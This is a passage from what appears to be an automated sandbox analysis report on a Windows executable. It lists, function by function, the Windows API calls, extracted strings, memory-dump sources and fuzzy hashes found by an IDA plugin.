                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CharNext
                                                                                              • String ID:
                                                                                              • API String ID: 1350042424-0
                                                                                              • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                              • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                                              • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                              • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                                              APIs
                                                                                                • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                              • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                                              • _wcscpy.LIBCMT ref: 004787E5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                              • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                              • API String ID: 3052893215-2127371420
                                                                                              • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                              • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                                              • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                              • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                                              APIs
                                                                                              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                              • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                                              • __swprintf.LIBCMT ref: 0045E7F7
                                                                                              • _wprintf.LIBCMT ref: 0045E8B3
                                                                                              • _wprintf.LIBCMT ref: 0045E8D7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                              • API String ID: 2295938435-2354261254
                                                                                              • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                              • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                                              • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                              • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                              • String ID: %.15g$0x%p$False$True
                                                                                              • API String ID: 3038501623-2263619337
                                                                                              • Opcode ID: fa1d6aa92a1fd950598fc85aadec7cc4031e0e4106e2d0b6ea716c15020f9163
                                                                                              • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                                              • Opcode Fuzzy Hash: fa1d6aa92a1fd950598fc85aadec7cc4031e0e4106e2d0b6ea716c15020f9163
                                                                                              • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                                              APIs
                                                                                              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                              • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                                              • __swprintf.LIBCMT ref: 0045E5F6
                                                                                              • _wprintf.LIBCMT ref: 0045E6A3
                                                                                              • _wprintf.LIBCMT ref: 0045E6C7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                              • API String ID: 2295938435-8599901
                                                                                              • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                              • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                                              • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                              • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                                              APIs
                                                                                              • timeGetTime.WINMM ref: 00443B67
                                                                                                • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                                              • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                                              • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                                                              • SetActiveWindow.USER32(?), ref: 00443BEC
                                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                                                              • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                                              • IsWindow.USER32(?), ref: 00443C3A
                                                                                              • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                                                                • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                              • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                                              • String ID: BUTTON
                                                                                              • API String ID: 1834419854-3405671355
                                                                                              • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                              • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                                              • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                              • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                                              • LoadStringW.USER32(00000000), ref: 00454040
                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                              • _wprintf.LIBCMT ref: 00454074
                                                                                              • __swprintf.LIBCMT ref: 004540A3
                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                              • API String ID: 455036304-4153970271
                                                                                              • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                              • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                                              • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                              • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                                              APIs
                                                                                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                                              • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                                              • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                                              • _memmove.LIBCMT ref: 00467EB8
                                                                                              • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                                              • _memmove.LIBCMT ref: 00467F6C
                                                                                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                                              • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                              • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                              • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 2170234536-0
                                                                                              • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                              • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                                              • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                              • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                                              • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                                              • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                                              • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                                              • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                                              • GetKeyState.USER32(00000012), ref: 00453E26
                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                                              • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: State$Async$Keyboard
                                                                                              • String ID:
                                                                                              • API String ID: 541375521-0
                                                                                              • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                              • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                                              • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                              • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                                              • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                                              • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                                              • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                                              • String ID:
                                                                                              • API String ID: 3096461208-0
                                                                                              • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                              • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                                              • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                              • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                                              • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                                              • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                                              • DeleteObject.GDI32(?), ref: 0047151E
                                                                                              • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                                              • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                                              • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                                              • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                                              • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                                              • DeleteObject.GDI32(?), ref: 004715EA
                                                                                              • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3218148540-0
                                                                                              • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                              • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                                              • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                              • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                              • String ID:
                                                                                              • API String ID: 136442275-0
                                                                                              • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                              • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                                              • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                              • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                                              APIs
                                                                                              • _wcsncpy.LIBCMT ref: 00467490
                                                                                              • _wcsncpy.LIBCMT ref: 004674BC
                                                                                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                              • _wcstok.LIBCMT ref: 004674FF
                                                                                                • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                              • _wcstok.LIBCMT ref: 004675B2
                                                                                              • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                              • _wcslen.LIBCMT ref: 00467793
                                                                                              • _wcscpy.LIBCMT ref: 00467641
                                                                                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                              • _wcslen.LIBCMT ref: 004677BD
                                                                                              • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
